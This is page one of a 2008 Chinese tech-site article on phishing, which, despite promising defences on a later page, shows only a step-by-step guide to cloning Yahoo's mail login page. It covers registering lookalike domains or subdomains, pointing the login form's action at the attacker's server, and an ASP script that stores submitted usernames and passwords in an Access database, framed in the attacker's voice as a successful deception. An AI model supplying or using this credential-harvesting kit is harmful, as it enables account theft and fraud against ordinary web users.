IT运维管理,创造商业价值!
中国IT运维网首页 | 资讯中心 | 运维管理 | 信息安全 | CIO视界 | 云计算 | 最佳案例 | 运维资源 | 专题策划 | 知识库 | 论坛

详解网络钓鱼的实现与防范技巧(1)

2008年10月29日
/

网络钓鱼因其严重危害网民利益和互联网信誉体制,越来越多地受到人们的关注,国际上已经成立反网络钓鱼工作小组(APWG,Anti-Phishing Working Group),这是一个联合机构,拥有大约800名成员,他们来自约490家金融服务公司、技术公司、服务提供商、国家法律执行机构和立法机构,这些机构的职责是向产业股份持有人提供一个保密论坛以讨论网络钓鱼问题。反网络钓鱼工作小组通过召开会议以及成员之间的电子形式的讨论,努力从硬成本和软成本两个方面来定义网络钓鱼的范围,分享信息和最佳操作模式以消除存在的问题,希望在不久的将来,彻底消灭网络钓鱼陷阱,还给大家一个真诚、诚信的互联网。

一. 钓鱼的原理:

网络钓鱼(Phishing)一词,是“Fishing”和“Phone”的综合体,由于黑客始祖起初是以电话作案,所以用“Ph”来取代“F”,创造了”Phishing”,Phishing 发音与 Fishing相同。 “网络钓鱼”就其本身来说,称不上是一种独立的攻击手段,更多的只是诈骗方法,就像现实社会中的一些诈骗一样。攻击者利用欺骗性的电子邮件和伪造的Web站点来进行诈骗活动,诱骗访问者提供一些个人信息,如信用卡号、账户用和口令、社保编号等内容(通常主要是那些和财务,账号有关的信息,以获取不正当利益),受骗者往往会泄露自己的财务数据。

现在网络钓鱼的技术手段越来越复杂,比如隐藏在图片中的恶意代码、键盘记录程序,当然还有和合法网站外观完全一样的虚假网站,这些虚假网站甚至连浏览器下方的锁形安全标记都能显示出来。网络钓鱼的手段越来越狡猾,这里首先介绍一下网络钓鱼的工作流程。通常有五个阶段:

 
图1

1. 钓鱼者入侵初级服务器,窃取用户的名字和邮件地址

2. 钓鱼者发送有针对性质的邮件3. 受害用户访问假冒网址

4. 受害用户提供秘密和用户信息被钓鱼者取得

5. 钓鱼者使用受害用户的身份进入其他网络服务器

关于恶意垃圾邮件,想必大家都很了解了,这里我们要实现和操作的是第三种,伪造目标网站,使目标用户访问假冒网站,从而完成我们的欺骗。

二. 实现方法

下面我们实现一个简单的网页钓鱼页面,大家可以根据自己的需要添加和修改。

1.首先我们申请一个空间,在空间上用来存放我们的网页

2.我们再申请一个域名,为了达到欺骗效果,我们可以申请一些名字和我们要欺骗的网站类似的域名:如: www.yahoo.com  我们申请一个 www.yaho.com

如果不能申请这些顶级域名的话,我们也可以修改我们的二级域名

如:我们自己的域名是tcbmail.com,我们可以添加一个yahoo.tcbmail.com的二级域名,这样可以增加欺骗的成功率

将我们的空间地址绑定到我们的域名上

3.选取目标,修改代码。

下面我们看一下我们要欺骗的目标,这里我们以yahoo为例,其他网站我们也可以采取类似办法

打开yahoo邮件的主页:https://login.yahoo.com/config/mail?.intl=us 

 
图2

查看其原代码,我们看到这样一句话

https://login.yahoo.com/config/login?" autocomplete="off" name="login_form" onsubmit="return

hash2(this)">

这句话的意思就是将我们输入的表单项的值提交到后台的处理网页https://login.yahoo.com/config/login?呵呵,这里就给我们提供了机会,我们可以仿造一个yahoo的邮件的主页,将提交后的页面换成我们自己的页面,通过后台数据库处理,就可以达到截获目标帐户密码的效果。

下面我们就具体操作一下

将yahoo邮件的主页保存到本地

P>https://login.yahoo.com/config/login?" autocomplete="off" name="login_form" onsubmit="return 

hash2(this)">

修改为

 {FORM method="post" action="http://我们自己 域名/test.asp"  target=_self}


保存为mail.html

4.编写test.asp,使其完成将输入的值存储到我们对应的数据库中,这里我们可以直接使用access数据库利用以下代码就可以完成我们的目的

<%
dim db,strcon,qq,pass,rs,strSql
qq=Request("username")
pass=Request("passwd")
strcon="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.mappath("pass.mdb")
Set db=Server.createobject("ADODB.connection")
db.open strcon
strSql="INSERT INTO name(name, pass) VALUES('"& qq &"','"& pass &"')" 
db.Execute(strSql)
%>

5.将编辑好的mail.html、test.asp以及我们编辑好的pass.mdb上传到空间中

访问http://我们自己的域名/mail.html

是不是就看到yahoo的邮箱主页

当你输入用户名、密码的时候,对应的输入已经存储到我们自己的数据库pass.mdb中了,欺骗成功.

 
图3

当然啦,现在大家的安全意识都比以前强了,如果大家留意我们所发的链接时,有些细心的朋友还是会注意到网页和实际的不同

但是如果你的域名欺骗性比较大的话,你的成功性也会比较大

如:http://mail.yaho.com.cn/mail.html看起来是不是很像

或者添加一个二级域名

如:http://yahoo.duay.com/mail.html也可以起到一个不错的欺骗效果

如果你申请的域名类似于www.tiger.com那我们该如何处理呢?

下面再简单介绍几种URL欺骗的方法


共3页: 1 [2] [3] 下一页
 第 1 页:  第 2 页:钓鱼实现
 第 3 页:钓鱼防范
发表评论请到:http://bbs.cnitom.com

相关阅读

图文热点

Power架构产品创新 IBM推动其本土化发展
Power架构产品创新 IBM推动其本土化发展自从1990年,IBM推出基于RISC系统的新产品线RS/6000(现称eServer p系列)之后,...
WAF:高校Web应用安全守护者
WAF:高校Web应用安全守护者最近几年高校网站被攻击的事件时有发生,造成了不良影响,因此越来越多的高校开始...

本类热点